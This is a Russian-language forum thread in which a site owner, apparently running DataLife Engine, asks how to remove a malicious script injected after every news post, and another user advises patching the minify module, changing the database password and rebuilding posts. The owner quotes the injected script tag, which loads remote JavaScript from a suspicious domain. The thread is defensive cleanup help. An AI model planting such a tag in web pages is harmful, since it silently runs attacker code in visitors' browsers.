Перейти к публикации

Подцепил фишинговую ссылку


Рекомендованные сообщения

Добрый день! У меня сайт d3ver.kz , подцепил фишинговую ссылку посоветуйте, где копать, что искать, как найти или выкурить её можно из сайта! Спасибо за любую помощь)))

Ссылка на сообщение
Поделиться на других сайтах

Щя шаблон поставлю, я прост бэкап шаблона хотел сделать, думал мож поможет

воспользуйтесь поиском за 2-3 дня 100500 тем подняли уже...

уже гуглил, но конкретных решений не нашёл, скинь сылку еси встречал 100500 тем по этому поводу

Ссылка на сообщение
Поделиться на других сайтах

Щя шаблон поставлю, я прост бэкап шаблона хотел сделать, думал мож поможет

а как вы думаете, здесь просто так просят показать сайт? надо же видеть пациента, а не гадать на кофейной гуще

Ссылка на сообщение
Поделиться на других сайтах

Щя шаблон поставлю, я прост бэкап шаблона хотел сделать, думал мож поможет

а как вы думаете, здесь просто так просят показать сайт? надо же видеть пациента, а не гадать на кофейной гуще

Для начала поставите шаблон на сайт что бы можно было посмотреть проблему ))

Шаблон установлен, еси можете подскажите что делать, как избавиться :(

Ссылка на сообщение
Поделиться на других сайтах
Шаблон установлен, еси можете подскажите что делать, как избавиться
:(
Ссылка на сообщение
Поделиться на других сайтах

вот что я нашёл, на главной странице, в исходном коде после каждой новости цепляеться фишинговая сылка, получаеться после текста новости она цепляеться


<script async="async" type="text/javascript" src="http://google-webmaster.ru/1c383cd30b7c298ab50293adfecb7b18.js"></script>

как она туда прописываеться?

Ссылка на сообщение
Поделиться на других сайтах

ну понятно, броня крепка и танки наши быстры.

Ссылка на сообщение
Поделиться на других сайтах

ну понятно, броня крепка и танки наши быстры.

Это ты таким спамом не в темным набрал 2449 сообщений?

ХЕЕЕЕЛП!!! Кароч всё печально что делать? Я залес в базу SQL и "О БОЖЕ" в конце каждого топика добавлена эта фишинговая сылка

Ссылка на сообщение
Поделиться на других сайтах

Wizard2030,

Вы не установили патч http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

Установите данный патч. Смените пароль к БД, новый пароль поставьте в engine/data/dbconfig.php, потом в админпанели зайдите в раздел перестроения публикаций, и сделайте перестроение новостей, DLE автоматически удалит данный скрипт из новостей.

Ссылка на сообщение
Поделиться на других сайтах

уже гуглил, но конкретных решений не нашёл, скинь сылку еси встречал 100500 тем по этому поводу

Видимо плохо гуглил... :)ссылка ссылка и еще можно найти...
Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...